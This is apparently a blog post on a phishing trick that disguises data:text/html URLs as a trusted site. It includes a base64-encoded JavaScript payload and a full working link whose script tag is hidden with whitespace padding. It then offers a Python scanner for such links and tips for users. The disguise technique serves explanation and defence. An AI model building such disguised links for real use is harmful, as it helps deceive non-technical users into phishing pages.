Sneaky phishing method in modern browsers

Chrome, Firefox and most other modern browsers render a data:text/html URL as a page, including base64-encoded content. For example, we can prepend "data:text/html," to a trustworthy-looking URL such as "trustme.com": instead of loading the displayed URL, the browser renders the rest of the data URL as HTML and runs whatever is in the script tag that follows (yeah, I know a programmer would not fall for it, but your parents will!)

data:text/html,trustme.com <script src=data:text/html;base64,{BASE64 ENCODED JS}></script>

{BASE64 ENCODED JS} can be replaced with any JavaScript. With a few lines of code we can load anything we want and make the user believe they are browsing trustme.com.

window.document.title = "Some test title";
window.document.body.outerHTML = "<iframe src=\"http://example.com\" style=\"border: 0;width: 100%;height:100%\"></iframe>";
window.document.body.style.padding = "0";
window.document.body.style.margin = "0";

The whole snippet, base64 encoded:

d2luZG93LmRvY3VtZW50LnRpdGxlID0gIlNvbWUgdGVzdCB0aXRsZSI7DQp3aW5kb3cuZG9jdW1lbnQuYm9keS5vdXRlckhUTUwgPSAiPGlmcmFtZSBzcmM9XCJodHRwOi8vZXhhbXBsZS5jb21cIiBzdHlsZT1cImJvcmRlcjogMDt3aWR0aDogMTAwJTtoZWlnaHQ6MTAwJVwiPjwvaWZyYW1lPiI7DQp3aW5kb3cuZG9jdW1lbnQuYm9keS5zdHlsZS5wYWRkaW5nID0gIjAiOw0Kd2luZG93LmRvY3VtZW50LmJvZHkuc3R5bGUubWFyZ2luID0gIjAiOw==

URL:

data:text/html,https://www.trust.me <script src=data:text/html;base64,d2luZG93LmRvY3VtZW50LnRpdGxlID0gIlNvbWUgdGVzdCB0aXRsZSI7DQp3aW5kb3cuZG9jdW1lbnQuYm9keS5vdXRlckhUTUwgPSAiPGlmcmFtZSBzcmM9XCJodHRwOi8vZXhhbXBsZS5jb21cIiBzdHlsZT1cImJvcmRlcjogMDt3aWR0aDogMTAwJTtoZWlnaHQ6MTAwJVwiPjwvaWZyYW1lPiI7DQp3aW5kb3cuZG9jdW1lbnQuYm9keS5zdHlsZS5wYWRkaW5nID0gIjAiOw0Kd2luZG93LmRvY3VtZW50LmJvZHkuc3R5bGUubWFyZ2luID0gIjAiOw==></script>

Add some spaces to the URL so the script tag is pushed out of view, build a simple link so it doesn't look suspicious, and here we go:

<a href="data:text/html,https://www.trust.me                                                                                                                                                                                                                                                                        <script src=data:text/html;base64,d2luZG93LmRvY3VtZW50LnRpdGxlID0gIlNvbWUgdGVzdCB0aXRsZSI7DQp3aW5kb3cuZG9jdW1lbnQuYm9keS5vdXRlckhUTUwgPSAiPGlmcmFtZSBzcmM9XCJodHRwOi8vZXhhbXBsZS5jb21cIiBzdHlsZT1cImJvcmRlcjogMDt3aWR0aDogMTAwJTtoZWlnaHQ6MTAwJVwiPjwvaWZyYW1lPiI7DQp3aW5kb3cuZG9jdW1lbnQuYm9keS5zdHlsZS5wYWRkaW5nID0gIjAiOw0Kd2luZG93LmRvY3VtZW50LmJvZHkuc3R5bGUubWFyZ2luID0gIjAiOw==></script>">Click here to load example.com in an iframe via js</a>

Examples (the two demo links from the original post):

  1. Some of the spaces removed from the snippet.
  2. So many spaces that the script isn't even visible.
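From the defender's side, the three things that make this link work are also what make it easy to spot in a mail body: a data:text/html target, a decoy URL as the first token of the data body, a long run of whitespace, and a script tag carrying a nested base64 data: URL. The following scanner is an added example, not code from the original post; it rebuilds the post's demo link from the four-line script above (re-encoding it at runtime rather than copying the blob), pulls every href out of a constructed mail body, and reports the flags plus the decoded payload so an analyst can see what the script would do without opening the link. The padding threshold of 20 and the flag names are assumptions of this example.

```python
import base64
import binascii
import re
from urllib.parse import unquote

# --- constructed sample input (not from a real mail) ----------------------
# SAMPLE_JS is the four-line snippet from the post; its base64 form is
# recomputed here so the sample link is self-consistent.
SAMPLE_JS = (
    'window.document.title = "Some test title";\r\n'
    'window.document.body.outerHTML = "<iframe src=\\"http://example.com\\" '
    'style=\\"border: 0;width: 100%;height:100%\\"></iframe>";\r\n'
    'window.document.body.style.padding = "0";\r\n'
    'window.document.body.style.margin = "0";'
)
SAMPLE_B64 = base64.b64encode(SAMPLE_JS.encode()).decode()
SAMPLE_HREF = (
    "data:text/html,https://www.trust.me" + " " * 200
    + "<script src=data:text/html;base64," + SAMPLE_B64 + "></script>"
)
SAMPLE_MAIL_HTML = (
    "<p>Please review your account.</p>"
    f'<a href="{SAMPLE_HREF}">Click here to sign in</a>'
    '<a href="https://www.trust.me/help">Help</a>'
)

# --- detection logic -------------------------------------------------------
OUTER_DATA_RE = re.compile(
    r"^data:(?P<mime>[^,;]*)(?P<params>(?:;[^,;]*)*),(?P<body>.*)$", re.S | re.I)
NESTED_B64_RE = re.compile(r"data:[^,;]*;base64,([A-Za-z0-9+/=]+)", re.I)
SCRIPT_TAG_RE = re.compile(r"<\s*script\b", re.I)
DECOY_RE = re.compile(r"^(?:https?://)?[\w-]+(?:\.[\w-]+)+", re.I)  # looks like a host/URL
HREF_RE = re.compile(r'href\s*=\s*"([^"]*)"', re.I)
PADDING_THRESHOLD = 20  # assumption: a whitespace run this long has no legitimate use in a URL


def analyze_href(href):
    """Classify one link target. The returned dict's 'flags' list is empty for ordinary links."""
    href = unquote(href.strip())
    result = {"href_prefix": href[:40], "flags": [], "decoy": None,
              "max_whitespace_run": 0, "decoded_payloads": []}
    m = OUTER_DATA_RE.match(href)
    if not m:
        return result  # http(s), mailto, ...: nothing to do here
    mime, body = m.group("mime").lower(), m.group("body")
    if mime.startswith("text/html"):
        result["flags"].append("data_uri_html")
    # The decoy is the first token of the data body when it looks like a host or URL.
    lead = body.lstrip().split(None, 1)[0] if body.strip() else ""
    if DECOY_RE.match(lead):
        result["decoy"] = lead
        result["flags"].append("decoy_url_prefix")
    result["max_whitespace_run"] = max((len(r) for r in re.findall(r"\s+", body)), default=0)
    if result["max_whitespace_run"] >= PADDING_THRESHOLD:
        result["flags"].append("whitespace_padding")
    if SCRIPT_TAG_RE.search(body):
        result["flags"].append("inline_script")
    # Decode every nested base64 data: URL so the analyst sees the script, not the blob.
    for blob in NESTED_B64_RE.findall(body):
        try:
            decoded = base64.b64decode(blob, validate=True).decode("utf-8", "replace")
        except (binascii.Error, ValueError):
            decoded = "<undecodable base64>"
        result["decoded_payloads"].append(decoded)
    if result["decoded_payloads"]:
        result["flags"].append("nested_base64_payload")
    return result


def scan_links(html):
    """Return the analysis of every href in an HTML body that raised at least one flag."""
    return [r for r in (analyze_href(h) for h in HREF_RE.findall(html)) if r["flags"]]


if __name__ == "__main__":
    for hit in scan_links(SAMPLE_MAIL_HTML):
        print(hit["flags"], "decoy:", hit["decoy"], "padding:", hit["max_whitespace_run"])
        for payload in hit["decoded_payloads"]:
            print("  payload:", payload.replace("\r\n", " | "))
```

The href regex is deliberately simple: a quoted attribute may legally contain spaces and angle brackets, which is exactly why the script tag survives inside the link. Note that since Chrome 60 and Firefox 59 the browsers block link-initiated top-level navigation to data: URLs, so a plain click on such a link no longer renders it; the links still show up in mail, and flagging them costs nothing.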


How can I prevent getting phished like this?

  1. Use a password manager that remembers your login URLs (KeePass, 1Password, etc.): it will not offer your credentials on a page whose URL does not match.
  2. Don't click on stuff in E-Mails ;D
  3. Check the certificate in your browser.
  4. Never log in on any site you opened from an email.

More about this topic:

  1. Gist by timruffles
  2. @tomscott

Felix
